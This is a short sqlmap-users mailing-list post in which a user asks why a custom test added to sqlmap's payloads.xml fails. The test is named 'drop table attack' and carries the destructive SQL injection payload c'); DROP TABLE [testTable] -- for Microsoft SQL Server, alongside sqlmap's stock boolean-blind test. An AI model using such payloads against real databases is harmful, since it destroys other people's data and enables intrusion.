[sqlmap-users] new test
Brought to you by:
inquisb
From: l.g. <ibo...@go...> - 2014-01-20 20:30:14
|
hi! In payloads.xml I substituted this snippet: - <!-- End of AGAINST boolean full-text search boundaries --> - <!-- Boolean-based blind tests - WHERE/HAVING clause --> - <test> - <test> <title>drop table attack</title> <stype>2</stype> <level>1</level> <risk>5</risk> <clause>1</clause> <where>1</where> <vector>c'); DROP TABLE [testTable] --</vector> - <request> <payload>c'); DROP TABLE [testTable] --</payload> <comment>--</comment> </request> - <response> <grep>object</grep> </response> - <details> <dbms>Microsoft SQL Server</dbms> </details> </test> - <test> <title>AND boolean-based blind - WHERE or HAVING clause</title> <stype>1</stype> <level>1</level> <risk>1</risk> <clause>1</clause> <where>1</where> <vector>AND [INFERENCE]</vector> - <request> <payload>AND [RANDNUM]=[RANDNUM]</payload> </request> - <response> <comparison>AND [RANDNUM]=[RANDNUM1]</comparison> </response> </test> with this: - <!-- End of AGAINST boolean full-text search boundaries --> - <!-- Boolean-based blind tests - WHERE/HAVING clause --> - <test> - <test> <title>AND boolean-based blind - WHERE or HAVING clause</title> <stype>1</stype> <level>1</level> <risk>1</risk> <clause>1</clause> <where>1</where> <vector>AND [INFERENCE]</vector> - <request> <payload>AND [RANDNUM]=[RANDNUM]</payload> </request> - <response> <comparison>AND [RANDNUM]=[RANDNUM1]</comparison> </response> </test> but it doesn't work.. thank you |